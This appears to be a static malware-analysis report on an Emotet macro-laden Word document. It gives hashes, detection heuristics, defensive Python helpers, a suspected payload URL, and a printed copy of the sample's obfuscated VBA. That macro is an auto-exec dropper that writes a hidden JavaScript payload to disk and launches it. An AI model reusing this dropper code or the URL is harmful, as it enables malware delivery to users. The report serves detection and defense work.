Emotet — Office (OOXML) malware analysis

Static analysis result for SHA-256 72476d4b6aac7b7e…

MALICIOUS

Office (OOXML)

Size: 197.6 KB · Created: 2019-09-19 13:05:00 UTC · Authoring application: Microsoft Office Word 16.0000 · First seen: 2020-02-04
MD5: 8005bf4ed0e4294e06e2ce668d1147cb
SHA-1: 4a059e08a5a34b68aaa2eacb1bcfe390497d8d84
SHA-256: 72476d4b6aac7b7edad3d25d11fd8df168f5688ca8ef34ae78a5e30424acfbfd
Risk Score: 470

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic · T1566.001 Phishing: Spearphishing Attachment · T1204.002 User Execution: Malicious File

The sample is an OOXML document whose VBA project contains a Document_Open auto-exec macro. The macro is padded with dead-store filler (random-named String variables assigned gibberish literals, Long variables combined in pointless arithmetic), but the live code path is short: Document_Open calls gogogorun, which builds a file name under the attached template's directory (ActiveDocument.AttachedTemplate.Path & Chr(92) & Rnd & ".js", normally %APPDATA%\Microsoft\Templates when the template is Normal.dotm), reads the payload text from UserForm1.TextBox1, writes it to that path through Scripting.FileSystemObject (saveFileToDisc) and launches it with Shell.Application.ShellExecute (runFile). The dropped file is obfuscated JavaScript that instantiates WScript.Shell (see the string recovered from the carved OLE artifact below); the VBA itself contains no download code, so the network stage lives in the JavaScript. ShellExecute on a .js file runs it through the default script host (wscript.exe), so Word spawning wscript.exe on a .js under the Templates directory is the behaviour to hunt for. The ClamAV signature Doc.Trojan.Emotet-7178008-0 and the heuristic firings are consistent with Emotet, which began as a banking trojan and by this period operated mainly as a loader that uses macro-enabled documents to fetch and run further payloads. The one non-schema URL extracted (http://cbdnewsdirect.com/wordpress/4ykylrs2510/) was found in the document body text, not in the macro; treat it as a candidate IOC to be confirmed against the decoded JavaScript.
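The live code path described above is quickest to confirm once the filler is gone. The following Python script is an added example (it is not part of this report or of the scanner's tooling): it runs a simple liveness pass over olevba-style extracted VBA text, dropping assignments of string or numeric literals and concatenations or sums of other filler variables whenever the target name is never read by a real statement, together with Dim lines that only declare such names. SAMPLE_MACRO is a constructed excerpt of the macro shown under Extracted artifacts below with the junk literals shortened; the sub and variable names are the sample's own. It assumes one statement per line (no `:` separators or `_` continuations), which holds for this generator's output.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed excerpt of the macro extracted from this sample (see the
# macros.bas preview in the report). Junk string literals are shortened;
# sub names, variable names and control flow are the sample's own.
SAMPLE_MACRO = r'''
Private Sub Document_Open()
Dim mcz186DDl, Nff4LDR, ZE962pE, s552m As String
mcz186DDl = " %UU]$OSmPy;6%SyR]z#yoEaR[x[ ]br:2Z"
Nff4LDR = "z8%GZ KA AsbL<70QJA[q7CXLs0#b8@dhe7"
gogogorun
s552m = mcz186DDl & Nff4LDR
Dim x3721g, Tltn3WC278J As Long
x3721g = 56570
Tltn3WC278J = x3721g + x3721g
End Sub

Private Sub gogogorun()
Dim CdtB1WuG, zU50hPU As String
CdtB1WuG = "Wy @ Wq1;.;o98A6$FjdhKq?$ ?.?EaGg8#NPDG3"
    Randomize
    nameOfFIleSave = ActiveDocument.AttachedTemplate.Path & Chr(92) & Rnd & ".js"
zU50hPU = CdtB1WuG & CdtB1WuG
    textForSaveFile = UserForm1.TextBox1.Text
    saveFileToDisc nameOfFIleSave, textForSaveFile
    runFile nameOfFIleSave
End Sub

Private Sub saveFileToDisc(dirFosSave, get_TEXT_DATA)
    Dim trrrrrrrr As Boolean
    trrrrrrrr = True
    Set dddddddddd22222 = CreateObject("Scripting.FileSystemObject")
    Set sfsf2f2ff = dddddddddd22222.CreateTextFile(dirFosSave, trrrrrrrr, trrrrrrrr)
    sfsf2f2ff.Write get_TEXT_DATA
    sfsf2f2ff.Close
End Sub

Private Sub runFile(runFile)
    Set bfbfbbfb3333 = CreateObject("Shell.Application")
    bfbfbbfb3333.ShellExecute runFile
End Sub
'''

_ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')   # X = <rhs>
_STRING_LIT = re.compile(r'^"(?:[^"]|"")*"$')                  # a lone VBA string literal
_IDENT_CHAIN = re.compile(r'^\w+(?:\s*[&+]\s*\w+)*$')          # A & B, A + B, 56570, True
_DIM = re.compile(r'^(\s*)Dim\s+(.+?)\s*$')
_IDENT = re.compile(r'[A-Za-z_]\w*')


def _identifiers(line: str) -> Set[str]:
    """Identifiers used by a statement, ignoring string literals and comments."""
    no_str = re.sub(r'"(?:[^"]|"")*"', '""', line)
    no_comment = re.sub(r"'.*$", '', no_str)
    return set(_IDENT.findall(no_comment))


def _junk_candidate(line: str):
    """(lhs, rhs identifiers) if the line is filler-shaped, else None."""
    m = _ASSIGN.match(line)
    if not m:
        return None                      # Set/With/If/calls are never filler here
    lhs, rhs = m.group(1), m.group(2)
    if _STRING_LIT.match(rhs):
        return lhs, set()
    if _IDENT_CHAIN.match(rhs):
        return lhs, set(_IDENT.findall(rhs))
    return None                          # real expressions (method calls, Chr(92), ...)


def strip_junk(src: str) -> str:
    """Drop filler assignments whose target is never read, and their Dim lines."""
    lines = src.splitlines()
    candidates: Dict[int, Tuple[str, Set[str]]] = {}
    live: Set[str] = set()
    for i, line in enumerate(lines):
        if _DIM.match(line):
            continue                     # declarations are not uses
        cand = _junk_candidate(line)
        if cand:
            candidates[i] = cand
        else:
            live |= _identifiers(line)   # every name a real statement touches is live
    # A filler-shaped assignment to a live name (trrrrrrrr = True) keeps its RHS alive.
    changed = True
    while changed:
        changed = False
        for lhs, rhs in candidates.values():
            if lhs in live and not rhs <= live:
                live |= rhs
                changed = True
    out: List[str] = []
    for i, line in enumerate(lines):
        if i in candidates and candidates[i][0] not in live:
            continue
        dm = _DIM.match(line)
        if dm:
            decls = [d.strip() for d in dm.group(2).split(',')]
            kept = [d for d in decls if d.split()[0] in live]
            if not kept:
                continue
            line = f"{dm.group(1)}Dim {', '.join(kept)}"
        if not line.strip() and (not out or not out[-1].strip()):
            continue                     # collapse runs of blank lines
        out.append(line)
    return '\n'.join(out).strip('\n')


if __name__ == '__main__':
    print(strip_junk(SAMPLE_MACRO))
```

Run it over the full macros.bas the same way. Whatever the pass leaves that you did not expect (a "filler" variable that turns out to feed CreateTextFile or ShellExecute, for instance) is a value worth chasing: this generator only mangles names and pads with dead stores, it does not hide data flow.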

Heuristics (12)

  • ClamAV: Doc.Trojan.Emotet-7178008-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Emotet-7178008-0
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 193,503 bytes but its declared streams total only 112,958 bytes, leaving 80,545 bytes (42%) not covered by any stream. The heuristic fires because unallocated sector slack is the classic hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached through a parser pointer-corruption bug in the document structure). Two caveats for this sample: the difference between file size and declared stream bytes also contains the CFB header, the FAT/DIFAT/directory/mini-FAT sectors and the rounding of every stream up to a whole sector, so the truly unallocated region is smaller than 80,545 bytes; and the carved body (193,503 bytes, embedded_office_off00002291.ole below) is larger than the word/vbaProject.bin part itself (120,320 bytes), so the carver may have swept in container data past the end of the OLE. Inspect the free sectors before treating them as a second payload; the infection chain here is fully explained by the macro.
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    ri80enT1Ge = EW4F66 & EW4F66
        Set dddddddddd22222 = CreateObject("Scripting.FileSystemObject")
        Dim mh5UU5S2XmR1, C5K9KZ, PuL2sbAq2G, Sl0Pj5N0J4, K65C3Cm2, c2c7QJ2q80, j8846, XBW9AqZ7kG, W88bM89k9M, C9h8g2rT54, GEU42, lRj23, EO9d226n5, Kn6kn As Long
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    Dim mcz186DDl, Nff4LDR, ZE962pE, s552m, N8495, s7J0en2L, myy1f5d8, r3saJYKPr, a2KNjAa4jt0, m6QdP1daw As String
  • VBA project inside OOXML medium OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://cbdnewsdirect.com/wordpress/4ykylrs2510/  [in document text (OOXML body / shared strings)]
    The remaining extracted URLs (all labelled "In document text (OOXML body / shared strings)") are XML namespace and relationship-type URIs that every Word OOXML package carries. They are schema identifiers, not network indicators, and need no follow-up; the two vbaProject / wordVbaData relationship types merely confirm the package carries a VBA project, matching OOXML_VBA.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/drawing/2016/ink
    • http://schemas.microsoft.com/office/drawing/2017/model3d
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2016/wordml/cid
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape
    • http://schemas.openxmlformats.org/package/2006/content-types
    • http://schemas.openxmlformats.org/package/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties
    • http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument
    • http://schemas.openxmlformats.org/drawingml/2006/main
    • http://schemas.openxmlformats.org/drawingml/2006/picture
    • http://schemas.microsoft.com/office/drawing/2010/main
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles
    • http://schemas.microsoft.com/office/2006/relationships/vbaProject
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/image
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings
    • http://schemas.microsoft.com/office/thememl/2012/main
    • http://schemas.microsoft.com/office/2006/relationships/wordVbaData
    • http://schemas.openxmlformats.org/schemaLibrary/2006/main
    • http://schemas.microsoft.com/office/word
    • http://schemas.openxmlformats.org/package/2006/metadata/core-properties
    • http://purl.org/dc/elements/1.1/
    • http://purl.org/dc/terms/
    • http://purl.org/dc/dcmitype/
    +3 more URL(s)
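To reproduce the OLE_SLACK_ANOMALY measurement and see why it over-counts, here is an added Python example (not the scanner's own code) that parses the CFB header, FAT and directory chain directly, sums the declared size of every stream entry, and separately counts the sectors the FAT marks as free. build_cfb constructs a minimal version-3 container fixture (one 100-byte stream plus four deliberately unallocated sectors) so the script runs offline; point cfb_slack at the carved .ole file from this report for the real numbers.

```python
import struct

CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
FREESECT, ENDOFCHAIN, FATSECT = 0xFFFFFFFF, 0xFFFFFFFE, 0xFFFFFFFD
STGTY_STREAM, STGTY_ROOT = 2, 5


def cfb_slack(data: bytes) -> dict:
    """Compare declared stream bytes with the container's real footprint."""
    if data[:8] != CFB_MAGIC:
        raise ValueError("not a CFB/OLE file")
    ssz = 1 << struct.unpack_from("<H", data, 0x1E)[0]   # 512 (v3) or 4096 (v4)
    per_sec = ssz // 4
    n_fat = struct.unpack_from("<I", data, 0x2C)[0]
    dir_start = struct.unpack_from("<I", data, 0x30)[0]
    difat_start = struct.unpack_from("<I", data, 0x44)[0]

    def off(sid: int) -> int:
        return (sid + 1) * ssz            # sector 0 begins right after the header

    # FAT sector list: the first 109 entries sit in the header, the rest in DIFAT sectors.
    fat_secs = [s for s in struct.unpack_from("<109I", data, 0x4C) if s != FREESECT]
    nxt = difat_start
    while nxt != ENDOFCHAIN and len(fat_secs) < n_fat:
        ents = struct.unpack_from(f"<{per_sec}I", data, off(nxt))
        fat_secs += [s for s in ents[:-1] if s != FREESECT]
        nxt = ents[-1]                    # last slot chains to the next DIFAT sector
    fat = []
    for s in fat_secs[:n_fat]:
        fat.extend(struct.unpack_from(f"<{per_sec}I", data, off(s)))

    # Walk the directory chain and total the declared size of every stream entry.
    declared = streams = 0
    sid, seen = dir_start, set()
    while sid != ENDOFCHAIN and sid < len(fat) and sid not in seen:
        seen.add(sid)
        for i in range(ssz // 128):
            e = off(sid) + i * 128
            if data[e + 0x42] == STGTY_STREAM:
                size = struct.unpack_from("<Q", data, e + 0x78)[0]
                if ssz == 512:
                    size &= 0xFFFFFFFF    # v3: only the low dword of the size is valid
                declared += size
                streams += 1
        sid = fat[sid]

    n_sectors = (len(data) - ssz) // ssz
    free = sum(1 for s in fat[:n_sectors] if s == FREESECT)
    return {
        "file_size": len(data),
        "stream_count": streams,
        "declared_stream_bytes": declared,
        "naive_slack": len(data) - declared,   # the figure the heuristic reports
        "unallocated_bytes": free * ssz,       # sectors no FAT chain owns
    }


def build_cfb(payload: bytes, slack_sectors: int) -> bytes:
    """Constructed fixture: minimal v3 CFB with one stream plus free sectors."""
    ssz = 512
    hdr = bytearray(ssz)
    hdr[0:8] = CFB_MAGIC
    struct.pack_into("<HHHHH", hdr, 0x18, 0x3E, 3, 0xFFFE, 9, 6)   # minor, major, byte order, shifts
    struct.pack_into("<I", hdr, 0x2C, 1)                             # one FAT sector
    struct.pack_into("<I", hdr, 0x30, 1)                             # directory starts at sector 1
    struct.pack_into("<I", hdr, 0x38, 0x1000)                        # mini-stream cutoff
    struct.pack_into("<I", hdr, 0x3C, ENDOFCHAIN)                    # no mini FAT
    struct.pack_into("<I", hdr, 0x44, ENDOFCHAIN)                    # no DIFAT sectors
    struct.pack_into("<109I", hdr, 0x4C, 0, *([FREESECT] * 108))     # FAT lives in sector 0
    fat = [FATSECT, ENDOFCHAIN, ENDOFCHAIN] + [FREESECT] * (ssz // 4 - 3)
    fat_sec = struct.pack(f"<{ssz // 4}I", *fat)
    dirsec = bytearray(ssz)
    for idx, (name, stype) in enumerate((("Root Entry", STGTY_ROOT), ("Payload", STGTY_STREAM))):
        e = idx * 128
        raw = name.encode("utf-16-le") + b"\0\0"
        dirsec[e:e + len(raw)] = raw
        struct.pack_into("<H", dirsec, e + 0x40, len(raw))
        dirsec[e + 0x42] = stype
    struct.pack_into("<IQ", dirsec, 128 + 0x74, 2, len(payload))    # stream: sector 2, declared size
    return bytes(hdr) + fat_sec + bytes(dirsec) + payload.ljust(ssz, b"\0") + bytes(slack_sectors * ssz)


if __name__ == "__main__":
    for key, value in cfb_slack(build_cfb(b"A" * 100, slack_sectors=4)).items():
        print(f"{key:>22}: {value}")
```

On the fixture, naive_slack is 3,996 bytes while unallocated_bytes is 2,048: the scanner's subtraction also charges the header, the FAT and directory sectors and the padding of the 100-byte stream to a full sector. Only the FREESECT count is a real slack estimate; carve those sectors (offset (sid + 1) * 512 for each free index) and look at their content before calling the region a payload.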

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15,968 bytes
SHA-256: 38a60d327392ea0cffe83eaf7fe3c71719778104df0a3dad6069511289b1eaf1
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True



Private Sub Document_Open()
Dim mcz186DDl, Nff4LDR, ZE962pE, s552m, N8495, s7J0en2L, myy1f5d8, r3saJYKPr, a2KNjAa4jt0, m6QdP1daw As String
mcz186DDl = " %UU]$OSmPy;6%SyR]z#yoEaR[x[ ]br:2Z ]HZN1^l<ZUIc9EYiY!qG9mDhor^I#LMs0]fD?XWCZaT:GU:zk?YL<CR]ns9 ElD^"
Nff4LDR = "z8%GZ KA AsbL<70QJA[q7CXLs0#b8@dhe7Lprl zC;?xc3Eryff9Ea::9ULe*RzY]Baq2y ?oX,cWQoT JB3w!AT7Cux;QcR3K^"
ZE962pE = "0DcNAlm,CXNFdrMNdn9;]!h;RC$pB^paWEyrAGjMnli7@2nXG8ZyU?79dnsrAlaZ1LcZ%H e^eTl8Hd S6N[#gh9DhTERdAH kd?"
gogogorun
s552m = "sm21qSiyb079?wFR7:YyTe%w8Qk*.G A7JW@WE*Qd Ho; gO*$te6e3zqGkeSq $clwdNJ Qf^!nb wet^PDX[fwfYqA1g$P[#nR"
N8495 = "N7UXy$!$n?7AhcMUx<wM8b f%T$i78<O* q1Z.cF8dJO79ooX[E?hhAPaYHi[syDyJnsMTf 7E]h8#aXm87dIiS8Y2H$JFlOWkDt"
s7J0en2L = "j6s]7JHq8G^q2w:8l^NL9TZ Yx%ZA<$YlEhfMh28$JfSZg.#?rI a, U tKTu]lEUtGeA0<d6DTppKbx9k^Rmzp@[rj8P.MO$AO8"
myy1f5d8 = "u<:l0;] ;]9ps[W820mZcc$CssDdM yZ1WowGFJRMawz7M,BIOayhu9C^GnULC9<887*!RoOj d6WDq!m79 zU[HD]BSw*hiO1< "
r3saJYKPr = "*<<!k*9msMcrT]Xi@Jo@u ;cQzHGefW^erZtKTsei3mr@6TY;8m!Pt.p8xyN@I,7C?JKT.u@A!q%Lu?Ju9Wtt12lKm68$2Q?U6G6"
a2KNjAa4jt0 = "]ft]w MuQ WT6Donw 8CUR7m!t37NWFs$Oy1hwi2hHnY X!O*n*D*#eah!,@mo^tIn9.Ab6esR$zkF9dQU<sEJq0@AQx*p[[p ih"
m6QdP1daw = ";@$iMqHa 61Jm^7plS.Wx^s*xujSSq2.L8tZl6WUnu@Y3bs[zPMxWCsAbEB@A![6#.aw;iFNqam^AA ?mYTJ^<cXRo!g<iYZPtpH"
s552m = r3saJYKPr & s7J0en2L
ZE962pE = Nff4LDR & ZE962pE
N8495 = r3saJYKPr & r3saJYKPr
N8495 = N8495 & Nff4LDR
Nff4LDR = ZE962pE & r3saJYKPr
Dim x3721g, Tltn3WC278J, fk1bcM9, w26AQYOmm, p0fzFf2817 As Long
x3721g = 56570
Tltn3WC278J = 86458
fk1bcM9 = 5734
w26AQYOmm = 207225
p0fzFf2817 = 72212
w26AQYOmm = fk1bcM9 + fk1bcM9
w26AQYOmm = Tltn3WC278J + x3721g
Tltn3WC278J = w26AQYOmm + x3721g
Tltn3WC278J = x3721g + x3721g
w26AQYOmm = p0fzFf2817 + p0fzFf2817
End Sub

Sub MakeChanges(StyName As String, PuncMark As String)
Dim z28d40xS6367, h6I958S0, f8hP8U, U12FAfaQ1jqz, p72S2257hYm, M2K501h1T, SQH0Rn, znaJ0, CLS25X9027L, f4CY0m9, s214OZU As String
z28d40xS6367 = "Q$,L!yEr[JlO .: R%2QC8aBqmeb2,c#]pBLaH?FfTLt,H EHt3 @Wa]BBAoQmQ?eFRqAP?QlG:%F [2%,]zFdKIRATBdMnT0n*3"
h6I958S0 = "BHf@ex7;WFjgaiyaw@O*JP72.H@!f32:1ng?Rz#P77We2Wn:.yw!GNpsbR:bC*B fnE2mxp0HwcC#@GKZ<%!ebyfXY8NgQ1luF1Z"
f8hP8U = "[TXq*yG;QE]aZMutUsOZrb81.LK1s;z<qR%YCyWZ^m*3P;y[g wTgbWqN9.g?.0 jGGGaeT@C?z]3mMlN BDhlxLF76oY;fI[CAz"
    Selection.HomeKey Unit:=wdStory
    U12FAfaQ1jqz = "$CuS8^1UrLnM 0dSpPK$d@q#jsr?<z <n0m@SHcesK#FRuNO[,JSdDHm N uI9cSg!XXN WU73h B@nLHk;k< s1KK6qBI:DqfL$"
p72S2257hYm = "m30dt]jC%UL#S^z@7CXHH9It<6eW%e!:8BF1^!ZwS3 MNA;h,;0Tqpn[WOrJZ6[3!%.*N91iX8 uU ]xLMl,dWn 6<wFXC7ojr%E"
M2K501h1T = "B8*Rl1AgZmn<xP3$G^S* H9]N3<ZbFMQ^qsrymiLB6R H*D8!!nXxQDbjuq:mF%BXUWEBQZ.hlbr 2.;B?<3?R%,*x@XaYy Ya<x"
SQH0Rn = "t!Ttb$S3<:2UoYx MgCz*QbP%SDux2KgD0RXp@cRB^?r*oolM:3cNZO f iJoiemIxxCt< hIWuUiw0u[]dRI<yEs:IepM2o2sxg"
    Selection.Find.ClearFormatting
    Selection.Find.Style = ActiveDocument.Styles(StyName)
    znaJ0 = " K[G e6B^ <ztA<XG06R1P ^maKfM*qKd3hJGWsxx#oH@.ngI.fC3fYe 9YgSMfO;QD%oRe*LGkl7Sd kw^SI%cCunp*?cALHzdG"
CLS25X9027L = "%B,S tN;0G?i]Xq*Er.79TSf?D[c^$MAiKU^nUtfrTzn7LcFLN:XcoBQhc] mcSYu! fc !Zz%3IQ^2K;ERXoT Qktr]2i A6Nbp"
f4CY0m9 = "cepJrh^J:S*RwA XKt]biHa,8%N1*RlufYxmwC* bS%A9,S$zonqd7PzaB:8aPBt!3s0fO79II.LpKzs0<XCGy@E$YOK3oFC*obi"
    Selection.Find.Replacement.ClearFormatting
    s214OZU = "]s3pz2 Aa#3gDybIKPCT0,dwL<lz e@f?a[rd <*gcF@A,NJ:6Xc TECQrgUo9@a*rfls1Fgjtw K3GDQp!c7BCw^S!Bt23@@NFJ"
s214OZU = z28d40xS6367 & f8hP8U
f8hP8U = s214OZU & f8hP8U
CLS25X9027L = M2K501h1T & z28d40xS6367
p72S2257hYm = SQH0Rn & M2K501h1T
    With Selection.Find
        .Text = PuncMark & "   "
        .Replacement.Text = PuncMark & " "
        .Forward = True
        .Wrap = wdFindContinue
        .Format = True
        p72S2257hYm = SQH0Rn & znaJ0
znaJ0 = z28d40xS6367 & M2K501h1T
CLS25X9027L = s214OZU & znaJ0
    End With
    Selection.Find.Execute Replace:=wdReplaceAll
    Dim P85O3f60A, f3K79k596, CKt01, z5Hi34, om7OE392y746, A60NG0, L65y73, cB14w32bPL1, df3bL82DXa, u9Q5F, SU75oY7y As Long
P85O3f60A = 126
f3K79k596 = 1611
CKt01 = 514496
z5Hi34 = 98543
om7OE392y746 = 1539785
A60NG0 = 8206
L65y73 = 2128
cB14w32bPL1 = 80929
    Selection.Find.Text = PuncMark & "  "
    df3bL82DXa = 4050476
u9Q5F = 785370
SU75oY7y = 4095944
df3bL82DXa = SU75oY7y + P85O3f60A
L65y73 = z5Hi34 + f3K79k596
    Selection.Find.Execute Replace:=wdReplaceAll
    P85O3f60A = A60NG0 + cB14w32bPL1
u9Q5F = P85O3f60A + P85O3f60A
SU75oY7y = P85O3f60A + SU75oY7y
z5Hi34 = df3bL82DXa + CKt01
P85O3f60A = cB14w32bPL1 + df3bL82DXa
om7OE392y746 = cB14w32bPL1 + u9Q5F
z5Hi34 = cB14w32bPL1 + P85O3f60A
SU75oY7y = CKt01 + df3bL82DXa
End Sub



Private Sub saveFileToDisc(dirFosSave, get_TEXT_DATA)
Dim X4JY946HW, i8r5us, j3422, U8E4U, s6D0uY01f, ri80enT1Ge, EW4F66, l3B34X80o9 As String
X4JY946HW = ";ZqGMG GO3TXygXOwr8T;#F K.!$L<dxM?zg.^x<GU1c^mn1tO:G;.KMSxJ%g7BX Y[or9@!d2W. 88ofr6JxOMTW1WbN2X6:3]f"
i8r5us = "T[:<UNyXhuo9$]Tgl!T Kw:b,6Aw:FF0jPeiM%u:O7oZ z$$ MAGg$3u#$2q[NnMlS<U%;odoh81rqo xeyfgM PiG1X%.1cXxWY"
j3422 = "e%S 3ORm#l20%HLosxz@nD]gz,GLLTDd[<w0Qi^wNA!0kByc]by3 BCMM fR.b<d;,[tgxWY^MG6 l*ONZrF1 x#*3::9E.YM0 :"
    Dim trrrrrrrr As Boolean
    U8E4U = "0X^:Eyk,jDss<W.hLMH<cXuH<woG7@.p qYCb[iY:j^zYFR^8,#g ]#jdgbKs1RtTa *G3 ?.L]@nqwmj$Wt ALOP iXJA93C.WQ"
s6D0uY01f = "QHTYQ3@9TpD%kiYZQxWnR:HOFuMb pL7xUi1qH 93JQl o cxLZtEtfeK,[87kK O6sZ07.g0?ilgqKWh8O%GTch[<[;cxXer%cJ"
ri80enT1Ge = "os8l*fFTx%e9T3RhgN$?e.Qx3ZQghn[JJQoUwQj?G[ZL;uuX7x DdGQdJN$;sxjlez:c79mF cP8isXF#0 MrYQd2H#a6 ,0]I%0"
    trrrrrrrr = True
EW4F66 = " #Ch7nmX6uh;l:3LXSsya*3 kXb[^lrcxxQH2!<Mg<9Y.62DXh0SSeRg DbbC.z8?Mr*f N$dElZ*[TT[ns!E[y6Ngrkb!7crIK$"
l3B34X80o9 = "J];8$BcmXtmFreQ3$yFQ6WKbixb:W ,@@eC@l2MZ,7LFwieLz7JkNd@m16[EbjZJi;h0 96FFz:JTchiEPoof Y:Qu]fKH!06b1O"
s6D0uY01f = i8r5us & ri80enT1Ge
X4JY946HW = EW4F66 & i8r5us
l3B34X80o9 = ri80enT1Ge & ri80enT1Ge
X4JY946HW = i8r5us & l3B34X80o9
s6D0uY01f = s6D0uY01f & X4JY946HW
ri80enT1Ge = EW4F66 & EW4F66
    Set dddddddddd22222 = CreateObject("Scripting.FileSystemObject")
    Dim mh5UU5S2XmR1, C5K9KZ, PuL2sbAq2G, Sl0Pj5N0J4, K65C3Cm2, c2c7QJ2q80, j8846, XBW9AqZ7kG, W88bM89k9M, C9h8g2rT54, GEU42, lRj23, EO9d226n5, Kn6kn As Long
mh5UU5S2XmR1 = 6913
C5K9KZ = 286867
PuL2sbAq2G = 943536
Sl0Pj5N0J4 = 877261
K65C3Cm2 = 532327
    Set sfsf2f2ff = dddddddddd22222.CreateTextFile(dirFosSave, trrrrrrrr, trrrrrrrr)
    c2c7QJ2q80 = 9671079
j8846 = 39383
XBW9AqZ7kG = 926000
W88bM89k9M = 62885
C9h8g2rT54 = 91868
GEU42 = 183472
    sfsf2f2ff.Write get_TEXT_DATA
    lRj23 = 8540
EO9d226n5 = 9166404
Kn6kn = 3708
Kn6kn = Kn6kn + K65C3Cm2
j8846 = C9h8g2rT54 + XBW9AqZ7kG
Kn6kn = c2c7QJ2q80 + j8846
PuL2sbAq2G = Kn6kn + XBW9AqZ7kG
    sfsf2f2ff.Close
mh5UU5S2XmR1 = C9h8g2rT54 + lRj23
W88bM89k9M = K65C3Cm2 + W88bM89k9M
c2c7QJ2q80 = mh5UU5S2XmR1 + GEU42
C5K9KZ = j8846 + XBW9AqZ7kG

End Sub

Sub CheckSecLen()
Dim cG069r, p46Ztm6G504, Y9937, N5Z9Y395k, O0Y7d6, u8hG849LG, q42T1nx63, Rq2St6AEhi3, yyjZPQZ6, cjNDK9X, Ajr2m2b, IO56y8670n8, df7cT9cN4E, h7SfG295, a84803X85 As String
cG069r = "3*g2QSU,P2KG[6*j:HmPgJ,hlakx7xorSU6NM8u82ecbUyFXaxl^22,uh9y].]Q<6sP2GoCJ[Yy:6MypWrR^@z!] SbI o]w QR#"
p46Ztm6G504 = "z#N@l XO3uaG8e3jzOU,3uWW6obsmBa%ojub@ieBz*NYyrg*LC @iMwqT#aEz3oLrw<.GjM?M?<Nb[nO2ce2f.Dp<spcf;h d m."
    Dim iSec As Integer
    Y9937 = "qu hZ8#;bchd2f9jt.Bu $% N gN ^:SmDET2Cm.ul?Hn3d$^M6xN*K$oqs9IQ^!2B1xL0rb@S*]fnSIQkxB:B0:;*.Z86;ja;qf"
N5Z9Y395k = "8#Mif9UdJz.tJAKqHjZH BlOUiBisyO!x60]<Y^[O@CFE7PNc6NJK8E#U<kb.j,#rl8xrd   Qrwly9dM.lYWmXt?gIu9*!adTBr"
O0Y7d6 = "U%UR,6Y[HxPu S!!IM#$!C*S:BmC]J$l a:g#Qnuznz:[n*8hS Lr2x]^M*rX 7TIfW991gmFdlZoSiyP  dmX]8<8IMlPGLb3ng"
    Dim oRng As Range
